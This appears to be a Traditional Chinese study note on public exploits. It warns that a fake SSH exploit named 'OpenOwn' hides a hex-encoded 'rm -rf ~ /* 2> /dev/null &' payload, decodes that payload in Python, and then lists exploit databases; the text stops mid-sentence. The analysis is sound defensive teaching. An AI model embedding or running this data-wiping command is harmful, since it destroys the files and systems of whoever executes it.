公開的漏洞(Public Exploits)
公開的漏洞(Public Exploits) 公開漏洞 OpenOwn 本來是針對 SSH 的漏洞攻擊程式,實際上內容非常詭異 首先是要求 root 的權限如下面這一段 if (geteuid()) { puts("Root is required for raw sockets, etc."); return 1; } 接著往下翻可以看到一段使用 16 進制編碼的 impcode 內容如下 [...] char jmpcode[] = "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f" "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"; [...] 透過 python3 將 16 進制解碼來看 └─$ python3 >>> jmpcode = ["\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"] >>> print(jmpcode) ['rm -rf ~ /* 2> /dev/null &'] --> 這個是從根目錄移除所有 object 的命令,且還使用了 2>/dev/null 將 standard error 丟到 null,這樣一來不小心使用到的人系統就掛了 公開漏洞資料庫 Exploit Database 由 Offsec 維護,是一個值得信賴的漏洞查找資料庫 https://www.exploit-db.com/ 另一個查找漏洞好用的網站 https://packetstormsecurity.com/ 以及訪間最多人使用的平台 GitHub https://github.com/ 但 GitHub 上是每個人都可以任意發佈的地方所以未經驗證的漏洞利用要盡量避免 可以使用一些官方的 GitHub 帳號來使用,例如 Of...